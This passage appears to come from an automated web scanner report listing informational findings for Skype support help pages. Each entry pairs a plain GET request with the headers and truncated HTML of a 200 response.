GET /en-us/category/SM_FEATURES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:05 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51517


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.94. https://support.skype.com/en-us/category/SM_GETTING_STARTED/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_GETTING_STARTED/

Request

GET /en-us/category/SM_GETTING_STARTED/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:03 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50336


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.95. https://support.skype.com/en-us/category/SM_MEMBERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_MEMBERS/

Request

GET /en-us/category/SM_MEMBERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:04 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51383


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.96. https://support.skype.com/en-us/category/SM_PAYMENTS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_PAYMENTS/

Request

GET /en-us/category/SM_PAYMENTS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50792


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.97. https://support.skype.com/en-us/category/SM_REPORTS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_REPORTS/

Request

GET /en-us/category/SM_REPORTS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47634


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.98. https://support.skype.com/en-us/category/SUBSCRIPTIONS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SUBSCRIPTIONS/

Request

GET /en-us/category/SUBSCRIPTIONS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:30 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52901


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.99. https://support.skype.com/en-us/category/TS_ACCOUNT/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/TS_ACCOUNT/

Request

GET /en-us/category/TS_ACCOUNT/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:08 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53126


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.100. https://support.skype.com/en-us/category/TS_INSTALL_UPGRADE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/TS_INSTALL_UPGRADE/

Request

GET /en-us/category/TS_INSTALL_UPGRADE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51439


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.101. https://support.skype.com/en-us/category/UKASH/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/UKASH/

Request

GET /en-us/category/UKASH/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:27 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48688


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.102. https://support.skype.com/en-us/category/VIDEO/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/VIDEO/

Request

GET /en-us/category/VIDEO/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:08 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48467


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.103. https://support.skype.com/en-us/category/VID_CALLING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/VID_CALLING/

Request

GET /en-us/category/VID_CALLING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:26 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51077


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.104. https://support.skype.com/en-us/category/VOICEMAIL/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/VOICEMAIL/

Request

GET /en-us/category/VOICEMAIL/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:19 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50796


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.105. https://support.skype.com/en-us/category/VOUCHERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/VOUCHERS/

Request

GET /en-us/category/VOUCHERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:23 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49832


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.106. https://support.skype.com/en-us/category/WINDOWS_MOBILE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/WINDOWS_MOBILE/

Request

GET /en-us/category/WINDOWS_MOBILE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:02 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49007


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.107. https://support.skype.com/en-us/category/YANDEX_MONEY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/YANDEX_MONEY/

Request

GET /en-us/category/YANDEX_MONEY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:25 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47756


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.108. https://support.skype.com/en-us/faq/FA10414/How-do-subscriptions-work  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA10414/How-do-subscriptions-work

Request

GET /en-us/faq/FA10414/How-do-subscriptions-work HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:58 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 58632


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: How do subscriptions work?</title>
   <meta name="description" content="Help using Skype - FAQs, user guides, t
...[SNIP]...

24.109. https://support.skype.com/en-us/faq/FA10416/Why-isn-t-my-subscription-working  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA10416/Why-isn-t-my-subscription-working

Request

GET /en-us/faq/FA10416/Why-isn-t-my-subscription-working HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:00 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 58129


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: Why isn&#039;t my subscription working?</title>
   <meta name="description" content="Help using Skype - FAQs, u
...[SNIP]...

24.110. https://support.skype.com/en-us/faq/FA109/I-ve-forgotten-my-password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA109/I-ve-forgotten-my-password

Request

GET /en-us/faq/FA109/I-ve-forgotten-my-password HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:24 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 55107


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: I...ve forgotten my password...</title>
   <meta name="description" content="Help using Skype - FAQs, user guid
...[SNIP]...

24.111. https://support.skype.com/en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook

Request

GET /en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:55 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54830


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: Can I make video calls on Facebook?</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.112. https://support.skype.com/en-us/faq/FA140/How-can-I-change-my-privacy-settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA140/How-can-I-change-my-privacy-settings

Request

GET /en-us/faq/FA140/How-can-I-change-my-privacy-settings HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:51 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54416


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: How can I change my privacy settings?</title>
   <meta name="description" content="Help using Skype - FAQs, use
...[SNIP]...

24.113. https://support.skype.com/en-us/faq/FA331/What-is-an-Online-Number  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA331/What-is-an-Online-Number

Request

GET /en-us/faq/FA331/What-is-an-Online-Number HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:14 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52452


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: What is an Online Number?</title>
   <meta name="description" content="Help using Skype - FAQs, user guides, tr
...[SNIP]...

24.114. https://support.skype.com/en-us/faq/FA351/How-can-I-pay-for-Skype-products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA351/How-can-I-pay-for-Skype-products

Request

GET /en-us/faq/FA351/How-can-I-pay-for-Skype-products HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:58 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52523


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: How can I pay for Skype products?</title>
   <meta name="description" content="Help using Skype - FAQs, user gu
...[SNIP]...

24.115. https://support.skype.com/en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype

Request

GET /en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53765


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: Why can&#039;t I sign in to Skype?</title>
   <meta name="description" content="Help using Skype - FAQs, user g
...[SNIP]...

24.116. https://support.skype.com/en-us/glossary  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/glossary

Request

GET /en-us/glossary HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:34 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 67965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="e
...[SNIP]...

24.117. https://support.skype.com/en-us/search_first/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/search_first/

Request

GET /en-us/search_first/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43091


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us"
...[SNIP]...

24.118. https://support.skype.com/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/

Request

GET /en/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:41 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 63182


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user guid
...[SNIP]...

24.119. https://support.skype.com/en/category/BANK_TRANSFERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/BANK_TRANSFERS/

Request

GET /en/category/BANK_TRANSFERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:58 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51315


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.120. https://support.skype.com/en/category/BIZ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/BIZ

Request

GET /en/category/BIZ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:46 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...

24.121. https://support.skype.com/en/category/CALL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/CALL

Request

GET /en/category/CALL HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 44003


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...

24.122. https://support.skype.com/en/category/CREDIT_CARDS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/CREDIT_CARDS/

Request

GET /en/category/CREDIT_CARDS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:01 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50457


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.123. https://support.skype.com/en/category/GIFT_CERTIFICATES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/GIFT_CERTIFICATES/

Request

GET /en/category/GIFT_CERTIFICATES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:04 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 46746


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.124. https://support.skype.com/en/category/GIROPAY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/GIROPAY/

Request

GET /en/category/GIROPAY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47750


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.125. https://support.skype.com/en/category/MESSAGING  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/MESSAGING

Request

GET /en/category/MESSAGING HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:34 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...

24.126. https://support.skype.com/en/category/MONEYBOOKERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/MONEYBOOKERS/

Request

GET /en/category/MONEYBOOKERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:05 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47737


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.127. https://support.skype.com/en/category/PAY  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PAY

Request

GET /en/category/PAY HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:37 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...

24.128. https://support.skype.com/en/category/PAYMENT_PRICES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PAYMENT_PRICES/

Request

GET /en/category/PAYMENT_PRICES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:58 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52082


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.129. https://support.skype.com/en/category/PAYPAL/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PAYPAL/

Request

GET /en/category/PAYPAL/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47711


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.130. https://support.skype.com/en/category/PAYSAFECARD/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PAYSAFECARD/

Request

GET /en/category/PAYSAFECARD/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:08 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47769


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

